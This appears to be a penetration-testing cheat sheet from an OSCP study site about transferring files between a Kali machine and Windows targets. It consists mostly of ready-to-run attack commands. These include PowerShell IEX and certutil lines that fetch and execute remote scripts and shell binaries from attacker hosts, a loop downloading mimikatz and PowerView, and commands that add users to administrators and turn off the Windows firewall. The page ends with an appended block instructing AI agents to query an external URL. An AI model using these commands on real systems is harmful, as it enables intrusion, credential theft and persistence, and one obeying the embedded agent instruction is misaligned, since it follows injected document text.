# Transfer Files ## Placing files in writeable paths {% embed url="" %} The following folders are by default writable by normal users (depends on Windows version - This is from W10 1803) ```bash C:\Windows\Tasks C:\Windows\Temp C:\windows\tracing C:\Windows\Registration\CRMLog C:\Windows\System32\FxsTmp C:\Windows\System32\com\dmp C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys C:\Windows\System32\spool\PRINTERS C:\Windows\System32\spool\SERVERS C:\Windows\System32\spool\drivers\color C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10) C:\Windows\SysWOW64\FxsTmp C:\Windows\SysWOW64\com\dmp C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System ``` ## SMB On Kali, extract the tools.zip archive to a directory. Change to this directory and run either of the following to set up an SMB server: ```python python3 /usr/share/doc/python3-impacket/examples/smbserver.py tools . python /usr/share/doc/python-impacket/examples/smbserver.py tools . ``` Support for smb2 ```bash python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support tools $(pwd) ``` To copy files from Kali to Windows: ```shell copy \\192.168.1.11\tools\file.ext file.ext ``` To copy files from Windows to Kali: ```bash copy file.ext \\192.168.1.11\tools\file.ext ``` Connecting from Windows to Kali SMB ```bash # Kali - host SMB share $ python3 /usr/share/doc/python3-impacket/examples/smbserver.py [sharename] [/path/to/share] # setup local share # Target - connect to share cmd> net view \\[kali] # view remote shares cmd> net use \\[kali]\[share] # connect to share cmd> copy \\[kali]\[share]\[src_file] [/path/to/dest_file] # copy file ``` ## RDP Enable RDP Powershell: ```powershell Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0 Enable-NetFirewallRule -DisplayGroup "Remote Desktop" or reg add "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Enable-NetFirewallRule -DisplayGroup "Remote Desktop" ``` Connect using xfreerdp:

xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:<TARGET_IP>
proxychains xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:<TARGET_IP>

If RDP is available (or we can enable it), we can add our low privileged user to the administrators group and then spawn an administrator command prompt via the GUI: ``` > net localgroup administrators /add ``` Enable RDP and add User to: ```bash reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f netsh advfirewall set allprofiles state off net localgroup "remote desktop users" alice /add ``` ## Powershell .ps1 This is a simple powershell script to download files: ```powershell $baseUrl = "http://192.168.119.139/" $fileNames = @("PowerUP.ps1", "PowerView.ps1", "mimikatz.exe", "winPEASany.exe") $downloadPath = "C:\Winodws\Tasks" foreach ($fileName in $fileNames) { $url= $baseUrl + $fileName $filePath = Join-Path $downloadPath $fileName Invoke-WebRequest -Uri $url -OutFile $filePath Write-Host "Downloaded $fileName to $filePath" } ``` ## Powershell ```powershell # Download file from remote to local powershell -c (New-Object Net.WebClient).DownloadFile('http://[host]:[port]/[file]', '[file]') powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')" # Execute remote PS script PS> IEX (New-Object System.Net.WebClient).DownloadString('http://[kali]/[script].ps1') ``` ## IWR From Windows: ``` IWR -Uri http://KALI_IP:PORT -OutFile C:\Path\To\File ``` ## Certutil From kali: ``` python3 -m http.server 9999 ``` From Windows CMD: ```powershell certutil -urlcache -split -f http://:9999/shell_445.exe C:\\Windows\\Tasks\\shell_445.exe ``` ## Bitsadmin From Windows cmd: ``` bitsadmin /transfer badthings http://[kali]:[port]/[src_file] [dest_file] ``` ## SSH server Let’s download a file to our Kali box using SCP. Start a SSH server if it is not already running ``` systemctl start ssh.socket ``` ```bash # Download from Kali scp @:C:/Windows/Tasks/file.txt . # Upload from Target scp /tmp/linpeas.out kali@:/home/kali/Offensive/PGs/ ``` ## Netcat Windows: ```bash C:\Users\offsec> nc -nlvp 4444 > incoming.exe listening on [any] 4444 ... ``` Kali: ```bash kali@kali:~$ locate wget.exe /usr/share/windows-resources/binaries/wget.exe kali@kali:~$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe (UNKNOWN) [10.11.0.22] 4444 (?) open ``` The connection is received by Netcat on the Windows machine as shown below: ```powershell C:\Users\offsec> nc -nlvp 4444 > incoming.exe listening on [any] 4444 ... connect to [10.11.0.22] from ``` ## Socat Alice wants to share a file with Bob: ```bash kali@kali:~$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt ``` Bob downloads the file from Alice host: ```powershell C:\Users\offsec> socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create ``` ## Servers ### Python2 ```bash python -m SimpleHTTPServer 7331 ``` ### Python3 ```bash python3 -m http.server 7331 ``` ### PHP ```bash php -S 0.0.0.0:8000 ``` ### Ruby ```bash ruby -run -e httpd . -p 9000 ``` ### Busybox ```bash busybox httpd -f -p 10000 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://oscp.nstsec.com/transfer-files.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.